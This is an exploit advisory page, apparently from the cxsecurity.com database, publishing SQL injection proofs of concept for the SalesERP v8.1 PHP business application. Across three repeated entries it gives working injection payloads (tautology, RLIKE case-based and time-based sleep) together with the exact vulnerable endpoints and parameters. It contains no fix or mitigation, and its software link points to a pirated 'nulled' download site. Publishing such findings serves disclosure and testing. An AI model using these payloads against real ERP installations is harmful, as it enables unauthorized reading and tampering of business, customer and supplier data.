SalesERP 8.1 SQL Injection

2019.05.13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

=========================================================================================== # Exploit Title: SalesERP v.8.1 SQL Inj. # Dork: N/A # Date: 13-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp # Software Link: http://www.codelist.cc/scripts/236407-erp-v810-business-erp-solution-product-shop-company-management-nulled.html # Version: v8.1 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: ERP is a Modern and responsvie small Business management system. It is developed by PHP and Codeginiter framework. It is design and develop for thinking shop, small business, company and any types of business.Here has accounting, management, invoice,user and data analysis. =========================================================================================== # POC - SQLi # Parameters : customer_id, product_id # Attack Pattern : %27/**/oR/**/4803139=4803139/**/aNd/**/%276199%27=%276199 # POST Method : http://localhost/erpbusiness/SalesERPv810/Cproduct/product_by_search?product_id=99999999[SQL Inject Here] # POST Method : http://localhost/erpbusiness/SalesERPv810/Ccustomer/paid_customer_search_item?customer_id=99999999[SQL Inject Here] =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: SalesERP v.8.1 SQL Inj. # Dork: N/A # Date: 13-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp # Software Link: http://www.codelist.cc/scripts/236407-erp-v810-business-erp-solution-product-shop-company-management-nulled.html # Version: v8.1 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: ERP is a Modern and responsvie small Business management system. It is developed by PHP and Codeginiter framework. It is design and develop for thinking shop, small business, company and any types of business.Here has accounting, management, invoice,user and data analysis. =========================================================================================== # POC - SQLi # Parameters : supplier_name # Attack Pattern : %27/**/RLIKE/**/(case/**/when/**//**/4190707=4190707/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'=' # POST Method : http://localhost/erpbusiness/SalesERPv810/Csupplier/search_supplier?supplier_name=2900757&supplier_id=[SQL Inject Here] =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: SalesERP v.8.1 SQL Inj. # Dork: N/A # Date: 13-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp # Software Link: http://www.codelist.cc/scripts/236407-erp-v810-business-erp-solution-product-shop-company-management-nulled.html # Version: v8.1 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: ERP is a Modern and responsvie small Business management system. It is developed by PHP and Codeginiter framework. It is design and develop for thinking shop, small business, company and any types of business.Here has accounting, management, invoice,user and data analysis. =========================================================================================== # POC - SQLi # Parameters : supplier_name # Attack Pattern : 1260781%27 oR if(length(0x454d49524f474c55)>1,sleep(3),0) --%20 # POST Method : http://localhost/erpbusiness/SalesERPv810/Cproduct/add_supplier?add-supplier=Save&address=[TEXT INPUT]4990130&details=[TEXT INPUT]5207543&supplier_name=[SQL Inject Here] ===========================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top